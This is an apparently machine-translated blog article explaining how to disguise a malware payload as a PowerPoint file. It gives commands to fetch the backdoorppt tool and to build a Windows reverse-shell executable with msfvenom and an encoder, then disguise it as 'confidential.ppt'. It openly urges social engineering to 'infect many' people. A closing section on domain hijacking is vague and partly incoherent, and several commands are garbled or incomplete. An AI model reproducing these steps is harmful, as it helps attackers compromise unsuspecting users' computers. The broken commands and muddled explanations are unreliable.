Payload Camouflaged (not every file is what it appears to be)

When we talk about camouflaging, people who do not want to be seen by others come to mind. As if hiding their identity or they are simply those who do not get to know each other well, and what is seen, is not. This is the way it happens in the IT area.

Now, what is Payload is the set of data transmitted in which the message would be sent. The payload includes the headers or metadata that are sent to facilitate the delivery of the message, being a payload that executes a vulnerability or that takes advantage of it, but it has to be executed by the user in order to take advantage of that vulnerability.

When these vulnerabilities are presented to us in our systems, if we refer to the payload, we must know the Exploit because a vulnerability while Payload is the load that is executed at that moment with the vulnerability-

Camouflage a payload

Generally it is necessary to disguise it because the user notices the strange file, he will not execute it, delete it or in other cases notify security experts about the appearance of that file or the attempt by someone to send him a strange file.

In general, camouflaging is going unnoticed regarding the information or file you want to camouflage. It is important to know which ones. They are the tools to create a camouflaged payload. Tool that we can find and are available.

There are countless tools to create and camouflage payloads, in fact 3 are listed below.

1. msfvenom available in Hercules (the payload is created).

2. Metasploit framework.

3. Backdoorppt (the easiest to use as an example of cloaking).

Starting to camouflage a payload with backdoorppt.

For this example, Debian GNU / Linux version 8 and 9 are used to run this tool.

The first thing is to download it since it is not available by default in any of the versions of said distribution, we can obtain it with the following commands:

$ mkdir backdoorppt

$ cd backdoorppt

$ wget

Once we have the file on the pc and being on the console in the folder where we download it, we proceed to the next step, which is to unzip it:

$ unzip

After this, a payload is generated (be careful, this is an example command to generate it with Hercules msfvenom) for this you must have msfvenom + Hercules running in the operating system.

$ msfvenom -a x86 –platform windows -p windows / shell / reverse_tcp LHOST = LPORT = 1234 -b "\ x00" -e x86 / shikata_ga_nai -f exe -o /tmp/documento.exe

The next step is; run backdoorppt with the following command as super user:

$ ./master/


$ sh master /

Note: if you use kde as a graphical environment, before running, you must run the command as a normal user:

$ xhost +

It will be executed, it will check the necessary dependencies and, as it is adapted for standard systems, it will install the dependencies that are necessary for its operation. In case of other distributions, the dependencies must be installed manually.

Next it will show a window to select the executable file to be camouflaged, we choose it, click on “OK” or “Open” then it will show us another window that the name we want to give to our camouflaged payload file, we give it the name for example: “confidential “, And click” accept “.

This will generate the camouflaged payload, if we see it with the ls command that its name and extension are:

$ ls

confidential? tpp.exe

And in the file explorer its name is; “confidential.ppt”, you just need a little social engineering and taking advantage of people’s curiosity so you will be able to infect many in this way.

Attacks on the network

Many times when surfing the net we go unnoticed and without knowing the different types of camouflage we could be facing an attack, due to the different threats that we encounter every day, which could be in a serious situation when trying to violate our security. Although many times we protect ourselves with tools that protect us, however, there are hackers who are only there at all times studying new techniques to be able to enter malicious software on your computer and violate it.

As I have mentioned in this article, there are different types of camouflage, among them we find domain camouflage attack, whose objective is to create panic in the user and take control of the domain of your website. Having control because he has managed to violate your domain and has full access which allows him to register the DNS in order to create new subdomains, so the attacker has the advantage of avoiding the blocking techniques of different websites or IP addresses.

In short, by being able to have full access, it can configure the entire network in its favor and control the domain by managing its attack and using its kit techniques and redirecting the IP resolutions that correspond to the attacker. Therefore, even if your domain is good and has all the security you should always be on the lookout and in constant vigilance because the attackers cannot use the different existing camouflages and access your domain.

However, if they manage to access your domain, it can be considered dangerous and it can be blocked, which would represent a serious problem, although the attacker is usually very skilled, he could direct you to another level of subdomain and go from subdomain until you reach the definitive subdomain which could end up in a highly malicious exploit.

Take into account step by step all the recommendations to avoid the appearance of payload camouflage and have security in our systems and other equipment that an attacker cannot access through domain. Knowing the risks that payload implies and that they manage to have a vulnerability would become fatal in our personal and business information which could not be allowed to have access. As they say, not all that glitters is gold, so it happens with the different existing camouflages and the new techniques that attackers have been studying to pass or access without our security being able to detect it.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.